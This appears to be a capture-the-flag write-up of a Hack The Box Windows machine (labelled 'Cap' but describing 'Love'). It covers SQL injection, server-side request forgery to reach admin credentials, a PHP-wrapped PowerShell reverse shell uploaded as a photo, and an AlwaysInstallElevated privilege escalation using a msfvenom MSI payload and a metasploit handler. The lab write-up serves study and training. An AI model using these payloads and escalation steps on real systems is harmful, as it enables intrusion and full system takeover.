4 minute read

There are spoilers below for the Hack The Box box named Cap. Stop reading here if you do not want spoilers!!!


I began by the standard enumeration flow, using nmap

# Nmap 7.91 scan initiated Wed Jun  9 13:19:10 2021 as: nmap -sC -sV -oA nmap/love
Nmap scan report for
Host is up (0.26s latency).
Not shown: 993 closed ports
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql?
5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jun  9 13:21:32 2021 -- 1 IP address (1 host up) scanned in 142.98 seconds

So, there are a few interesting things that may be seen. Visiting port 80 shows a voting system, port 5000 just shows an Access Denied page, and the SSL certificate from port 443 shows a different name (staging.love.htb).

Voting System (port 80)

I spent a while on this, the first thing I noticed is that the voter field is vulnerable to a timing SQL injection, using sqlmap I was able to pull the following credentials from it:


Unfortunately, throwing that hash into JTR and Hashcat reveals nothing, so that appears to be a deadend.

Continuing with the voting system enumeration, gobuster reveals that there are multiple directories with listings open and other additonal directories.


Those both could be interesting, but lets check out the other ports

File Scanning (staging.love.htb)

Adding staging.love.htb to my /etc/hosts file, I’m able to access this new site. It has a notification system (that doesn’t do anything) and a demo file scan. The demo file scan will download and display a file that you give it.

Forbidden (port 5000)

There’s another HTTP instance running on port 5000, but whenever visiting this page or attempting to access any subdirectories from it, I simply receive a 403 Forbidden error.

Accessing Forbidden

This part took me a long time to figure out, longer than it likely should have, but if you use the file scanner from staging.love.htb to scan, it can access the page! It’ll return

Vote Admin Creds admin: @LoveIsInTheAir!!!!

Vote Login

Given the previous credentials pulled fromt he forbitten page, I was then able to access the admin page located at love.htb/admin using the credentials admin:@LoveIsInTheAir!!!!!

Getting a Shell

Now that I have admin login, it’s time to look around. I immediately notice that I can create a user and upload a photo. I wonder if there’s any validate that this is a valid photo?

Since this is a PHP website running on a Windows machine (all stuff I know from the nmap scan and the file extensions in the URL), I crafted a PHP PowerShell reverse shell payload:


exec("powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('',9000);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush();}\$client.Close()\"");

I then started a reverse shell

$ nc -lnvp 9000

And uploaded this PHP file as an image. And it worked, no validate on the type of file being uploaded at all!!

PS C:\xampp\htdocs\omrs\images> whoami


Now that I have a low level shell, it’s time to begin enumeration again to determine how to move to a system shell. After checking a few of the standard enumeration paths, I noticed the following:

PS C:\xampp\htdocs\omrs\images> reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

    AlwaysInstallElevated    REG_DWORD    0x1

PS C:\xampp\htdocs\omrs\images> reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

    AlwaysInstallElevated    REG_DWORD    0x1

Because those (either one) are set to true, that means that any user is able to execute a .msi as system! So I then crafted an MSI payload:

$ msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=1234 -f msi > rshell1234.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of msi file: 159744 bytes

$ sudo python3 -m http.server 80
Serving HTTP on port 80 ( ...

Back on Windows I executed the installer

> msiexec /q /i

And on my machine I had a metasploit listener set up

$ msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost; set lport 1234; run"
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/meterpreter/reverse_tcp
lhost =>
lport => 1234
[*] Started reverse TCP handler on 
[*] Sending stage (175174 bytes) to
[*] Meterpreter session 1 opened ( -> at 2021-06-10 20:59:28 -0400

meterpreter > shell
Process 7128 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

nt authority\system


And success! We now have a system shell!!